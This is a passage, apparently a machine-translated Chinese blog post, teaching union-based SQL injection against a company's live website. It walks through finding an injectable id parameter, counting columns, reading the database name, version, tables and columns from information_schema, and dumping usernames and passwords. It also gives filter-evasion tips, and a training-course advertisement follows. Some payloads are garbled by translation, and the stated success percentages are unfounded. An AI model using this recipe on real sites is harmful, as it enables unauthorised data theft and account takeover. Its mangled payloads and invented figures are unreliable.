渗透测试之sql注入验证安全与攻击性能

由于渗透测试涉及安全性和攻击性，这里我们不会公布具体的URL，以方便交流和分享。

您可以在线找到公司官方网站，例如（http://www.XXXXXX.com/xxxx?id=1）。

1、拿到网页后进行查找注入点；

1. 使用单引号\’.在URL后面输入单引号并回车（如果报错可能是SQL注入：大约10%）

2.使用逻辑运算（在URL后输入，1=1是好的，1=2是坏的；SQL注入漏洞的概率约为40-60%）

3.使用休眠功能，俗称钓鱼功能（在URL后输入sleep(10)，会导致网页休眠10秒。休眠与网速有关，因此SQL注入漏洞出现这种情况的概率约为50%）。

4.使用计算进行测试（例如：id=1可以改为id=2-1或3-2，可以通过计算来完成，SQL注入漏洞的概率约为95-100%）

2、进行测试报字段通过（order by函数）；我的字段是9

在URL后添加按XXX（整数）排序，并多次使用XXX来查找重要值（报错和不报错的界限）。

3、通过寻找到的字段后进行联合查询；

URL+联合选择

1,2,3,4,5,6,7,8,9（显示字段序号对应的位置，一般第一个数字为序号，后面的数字为字段序号） 1 不应该可以更改，因为它只占据位置（可以重新定位）

4、查询数据库名；

URL+联合选择

1,2,database(),4,5,6,7,8,9（database()，占用的位置当然可以改，只要不占用1就没有问题）

5、查询数据库版本号；

URL + 联合选择1,2,3,4,version(),6,7,8,9

（version()，占用的位置当然可以改变，但是只要不占用1就没有问题）

查询数据库版本的目的是当mysql版本大于5.0时，必然会出现默认的库信息如：

我通常使用的默认库是：information_schema

6、查询数据库中的表名；

URL + 联合选择1,2,3,4,group_concat(表名),6,7,8,9,from

information_schema.tables 其中table_schema=database()可以找到所有表的表名。

7、直接爆出表中用户；

URL + 联合选择1,2,3,4,group_concat(column_name),6,7,8,9,from

information_schema.columns 其中table_name=‘表名’

注意： 开发人员非常聪明，可能会使用特殊字符来过滤他们的代码，因此您应该在输入查询之前将“表名称”转换为十六进制或其他值。

8、查看表中所有信息内容；

URL + Union select 1,2,3,4,group_concat(usename,0x7e,password),6,7,8,9,来自表名

获取每个用户的具体信息

PS：这里不再详细介绍如何破解后端URL并登录（注意，你可能必须尝试解密密码）。

提倡网络安全，不要徘徊法律界限，不要随意攻击他人网站。

根据上面列出的网络安全技能，网络安全需要学习外围管理能力、钓鱼远程控制能力、域入侵能力、流量分析能力、漏洞挖掘等常用技能，很容易理解。功能、代码审计功能等。

[—-免费获取以下所有学习资料，了解互联网安全。 ]

网络安全学习与成长路径思维导图

60余款经典网络安全工具包

100+SRC漏洞分析报告

150多本实用网络安全攻防技术电子书

最权威的CISSP认证考试指南+题集

超过1800页的CTF实用技巧手册

各大网络安全公司最新面试题（含答案）

APP客户端安全检测指南（Android+IOS）

03网络安全的知识多而杂，怎么科学合理安排？

一、基础阶段

中华人民共和国网络安全法（含18个知识点）

Linux操作系统（包含16个知识点）

计算机网络（包含12个知识点）

SHELL（包含14个知识点）

HTML/CSS（包含44个知识点）

JavaScript（包含41个知识点）

PHP入门（包含12个知识点）

MySQL数据库（包含30个知识点）

Python（包含18个知识点）

————————————————

入门的第一步是系统学习计算机基础知识。这意味着学习操作系统、协议/网络、数据库、开发语言、常见漏洞原理等基础知识模块。学习了到目前为止的基础知识后，是时候将其付诸实践了。

由于互联网和计算机化的普及，网站系统需要大量的外部工作，程序员的水平和运维人员的构成各不相同，需要学习的东西也很多。

二、渗透阶段

SQL注入入侵与防范（含36个知识点）

XSS相关入侵及防范（含12个知识点）

上传验证入侵及防范（包含16个知识点）

|本文档包含入侵与防御（包含12个知识点）

CSRF入侵与防御（含7个知识点）

SSRF入侵与防御（包含6个知识点）

XXE渗透与防御（包含5个知识点）

远程代码执行入侵及防范（包含7个知识点）

…（包含…的知识点）

————————————————

掌握常见漏洞原理、用途和防御。即使在网络普及阶段，你也需要学习一些必要的工具。

需要掌握的关键工具和平台：burp、AWVS、Appscan、Nessus、sqlmap、nmap、shodan、fofa、代理工具ssrs、Hydra、medusa、airspoof等。上述工具可以使用上面提到的开源射击场进行练习。这就够了。

三、安全管理（提升）

创建入侵报告（包含21个知识点）

等级保护2.0（包含50个知识点）

应急响应（含5知识）

代码审计（包含8个知识点）

风险评估（包含11个知识点）

安全检查（含12知识）

数据安全（包含25个知识点）

————————————————

主要包括渗透报告的制作、网络安全等级的防护分级、应急响应、代码审计、风险评估、安全检查、数据安全、法律编制等。

此阶段主要针对已经从事网络安全工作并需要晋升到管理职位的个人。如果您只是为了找到工程师的工作而学习，那么您可能会也可能不会在这个阶段学习。

四、提升阶段（提升）

密码学（包含34个知识点）

JavaSE入门（包含92个知识点）

C语言（含140个知识点）

C++语言（含181个知识）

Windows逆向工程（含46个知识点）

CTF夺旗赛（包含36个知识点）

Android逆向工程（含40个知识点）

————————————————

主要包括密码学、JavaSE、C语言、C++、Windows逆向工程、CTF夺旗大赛、Android逆向工程等。

它主要面向已经从事网络安全工作并需要提高高级安全架构知识的人员。

[—-免费获取以下所有学习资料，了解互联网安全。 ]

网络安全学习与成长路径思维导图

60余款经典网络安全工具包

100+SRC漏洞分析报告

150多本实用网络安全攻防技术电子书

最权威的CISSP认证考试指南+题集

超过1800页的CTF实用技巧手册

各大网络安全公司最新面试题（含答案）

APP客户端安全检测指南（Android+IOS）

结语

我对朋友们的建议是，自学网络安全没有捷径。相比之下，系统化的网络安全是最具成本效益的方法，因为它可以节省大量的时间和精力成本。我对自学者的建议是，既然你已经走了这条路，即使未来看起来很困难，如果你咬紧牙关，坚持下去，你最终会得到你想要的结果。

# 以上关于SQL注入验证安全和渗透测试攻击性能的内容摘自网络，供大家参考。相关信息请参见官方公告。